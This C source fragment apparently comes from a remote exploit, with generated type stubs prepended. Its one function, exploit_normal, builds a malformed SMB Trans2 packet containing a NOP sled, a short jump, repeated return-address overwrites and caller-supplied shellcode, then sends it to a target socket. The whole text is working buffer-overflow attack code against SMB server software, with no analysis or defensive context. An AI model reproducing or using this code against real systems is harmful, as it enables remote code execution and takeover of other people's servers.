
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_4__ TYPE_2__ ;
typedef struct TYPE_3__ TYPE_1__ ;


typedef int exploit_data ;
typedef int buffer ;
struct TYPE_4__ {int type; int flags; int length; } ;
struct TYPE_3__ {int* protocol; int command; int tid; int uid; } ;
typedef TYPE_1__ SMB_HEADER ;
typedef TYPE_2__ NETBIOS_HEADER ;


 int htons (int) ;
 int memcpy (char*,...) ;
 int memset (char*,int,int) ;
 scalar_t__ send (int,char*,int,int ) ;
 int strlen (char*) ;
 int write_timer (int,int) ;

int exploit_normal(int sock, unsigned long ret, char *shellcode)
{

        char buffer[4000];
        char exploit_data[] =
                "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x90";

        int i = 0;
        unsigned long dummy = ret - 0x90;

        NETBIOS_HEADER *netbiosheader;
        SMB_HEADER *smbheader;

        memset(buffer, 0x00, sizeof(buffer));

        netbiosheader = (NETBIOS_HEADER *)buffer;
        smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        netbiosheader->type = 0x00;
        netbiosheader->flags = 0x04;
        netbiosheader->length = htons(2096);

        smbheader->protocol[0] = 0xFF;
        smbheader->protocol[1] = 'S';
        smbheader->protocol[2] = 'M';
        smbheader->protocol[3] = 'B';
        smbheader->command = 0x32;
        smbheader->tid = 0x01;
        smbheader->uid = 100;

        memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000);

        buffer[1096] = 0xEB;
        buffer[1097] = 0x70;

        for (i = 0; i < 4 * 24; i += 8) {
                memcpy(buffer + 1099 + i, &dummy, 4);
                memcpy(buffer + 1103 + i, &ret, 4);
        }

        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER),
                        exploit_data, sizeof(exploit_data) - 1);
        memcpy(buffer + 1800, shellcode, strlen(shellcode));

        if(write_timer(sock, 3) == 1) {
                if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;
                return 0;
        }

        return -1;
}
